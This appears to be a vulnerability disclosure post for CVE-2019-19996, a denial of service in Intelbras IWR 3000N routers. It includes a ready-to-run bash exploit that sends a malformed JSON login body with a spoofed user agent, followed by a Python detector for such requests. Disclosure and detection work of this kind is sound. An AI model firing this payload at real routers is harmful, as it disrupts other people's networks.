DoS — CVE-2019-19996

Rafael Silva
Dec 26, 2019

An issue was discovered on Intelbras IWR 3000N 1.8.7 devices. A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.

Proof Of Concept

First Step —

The router is active on IP 10.0.0.1.

Second Step —

Run the denial-of-service exploit.

#!/bin/bash
clear
read -p "Enter Target Address and Port: " target port # localhost 80

# Check whether the target answers ping before sending the request
alive=$(ping -c 1 "$target" | grep 'icmp' | wc -l)
if [ "$alive" -eq 0 ]; then
    echo "Target is down or offline."
    read -p "Would you Like to Proceed? (Y/n): " ans
    if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
        clear
        exit
    fi
fi

# Send the malformed body \""} to the login endpoint if the port is valid
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
    grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' "$target:$port/v1/system/login")
else
    echo "Incorrect Port."
fi

clear
# Ping again: no reply means the router went down (rebooting)
alive=$(ping -c 1 "$target" | grep 'icmp' | wc -l)
if [ "$alive" -eq 0 ]; then
    echo "Successfully router Offline."
else
    echo "Unsuccessful, Target Not be Vulnerable."
fi

Set IP and port

Third Step —

When the exploit is executed, the router suffers a denial of service and reboots.

Video —

https://vimeo.com/381487119
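
A defensive check for the malformed login request described above, as an added example that is not part of the original post: it parses raw HTTP requests and flags any POST to v1/system/login whose body is not a well-formed JSON object, the kind of filter a proxy or IDS placed in front of the device could apply. The function names, the constructed sample requests, the field names in them, and the assumption that legitimate login bodies are JSON objects are assumptions of this example, not details from Intelbras.

```python
import json

LOGIN_PATH = "/v1/system/login"  # endpoint named in the advisory text

def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    if len(parts) != 3:
        raise ValueError("bad request line")
    method, target, _version = parts
    return method, target.split("?", 1)[0], body

def classify_login_request(raw: bytes):
    """Return None for unrelated or well-formed requests, else a reason string."""
    try:
        method, path, body = parse_http_request(raw)
    except ValueError as exc:
        return f"unparseable request: {exc}"
    if method != "POST" or path.rstrip("/") != LOGIN_PATH:
        return None  # not a login attempt, out of scope for this check
    try:
        doc = json.loads(body.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        return f"login body is not valid JSON ({type(exc).__name__})"
    if not isinstance(doc, dict):
        # Assumption: a legitimate login body is a JSON object
        return "login body is valid JSON but not an object"
    return None

HDR = b"POST /v1/system/login HTTP/1.1\r\nHost: 10.0.0.1\r\n\r\n"
# Constructed sample requests; the JSON field names are hypothetical
SAMPLES = {
    "wellformed": HDR + b'{"username": "admin", "password": "example"}',
    "malformed": HDR + b'\\""}',  # the body string quoted in the advisory
    "scalar": HDR + b'"just a string"',
    "other": b"GET /index.html HTTP/1.1\r\nHost: 10.0.0.1\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:10s} -> {classify_login_request(raw) or 'ok'}")
```
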
